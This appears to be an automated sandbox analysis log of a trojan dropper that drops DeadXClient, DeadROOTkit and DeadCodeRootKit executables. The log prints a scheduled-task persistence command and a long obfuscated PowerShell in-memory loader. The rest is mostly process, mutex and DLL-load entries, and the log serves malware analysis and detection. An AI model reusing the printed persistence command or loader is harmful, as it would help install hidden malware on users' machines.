                        Source: Deadsvchost.exe.6.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Deadsvchost.exe.6.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: Deadsvchost.exe.6.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: DeadXClient.exe.4.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: DeadXClient.exe.4.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: DeadROOTkit.exe.4.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: DeadROOTkit.exe.4.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@32/116@3/3
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABE1ED0 GetLastError,FormatMessageW,2_2_00007FF6FABE1ED0
                        Source: C:\Users\Public\DeadCodeRootKit.exeCode function: 8_2_00151672 SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,8_2_00151672
                        Source: C:\Users\Public\DeadCodeRootKit.exeCode function: 8_2_001517A6 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,8_2_001517A6
                        Source: C:\Users\user\AppData\Local\Temp\1.exeFile created: C:\Users\Public\DeadXClient.exeJump to behavior
                        Source: C:\Users\Public\Deadsvchost.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3660:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\1.exeMutant created: \Sessions\1\BaseNamedObjects\wxpsOI0qOWugh4cNc
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
                        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
                        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
                        Source: C:\Users\Public\DeadROOTkit.exeMutant created: \Sessions\1\BaseNamedObjects\pPl3jDvgHvU1lllp
                        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
                        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
                        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4188
                        Source: C:\Users\Public\DeadXClient.exeMutant created: \Sessions\1\BaseNamedObjects\tnsxJywWJMkQgZ7E
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeFile created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeJump to behavior
                        Source: aoKTzGQSRP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: aoKTzGQSRP.exeReversingLabs: Detection: 76%
                        Source: CMaker 2.0.exeString found in binary or memory: id-cmc-addExtensions
                        Source: CMaker 2.0.exeString found in binary or memory: set-addPolicy
                        Source: CMaker 2.0.exeString found in binary or memory: --help
                        Source: CMaker 2.0.exeString found in binary or memory: --help
                        Source: CMaker 2.0.exeString found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
                        Source: CMaker 2.0.exeString found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
                        Source: CMaker 2.0.exeString found in binary or memory: can't send non-None value to a just-started generator
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_0-52
                        Source: unknownProcess created: C:\Users\user\Desktop\aoKTzGQSRP.exe "C:\Users\user\Desktop\aoKTzGQSRP.exe"
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeProcess created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeProcess created: C:\Users\user\AppData\Local\Temp\1.exe "C:\Users\user\AppData\Local\Temp\1.exe"
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeProcess created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe"
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\Public\DeadXClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
                        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 492 -p 4188 -ip 4188
                        Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4188 -s 1660
                        Source: unknownProcess created: C:\Users\Public\Deadsvchost.exe C:\Users\Public\Deadsvchost.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ac6bab9f-cf5e-448a-be82-36c64370aff3}
                        Source: unknownProcess created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
                        Source: unknownProcess created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
                        Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeProcess created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeProcess created: C:\Users\user\AppData\Local\Temp\1.exe "C:\Users\user\AppData\Local\Temp\1.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeProcess created: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeProcess created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe" Jump to behavior
                        Source: C:\Users\Public\DeadXClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ac6bab9f-cf5e-448a-be82-36c64370aff3}
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 492 -p 4188 -ip 4188
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4188 -s 1660
                        Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeSection loaded: libffi-8.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeSection loaded: libcrypto-3.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeSection loaded: libssl-3.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: avicap32.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: msvfw32.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeSection loaded: pdh.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
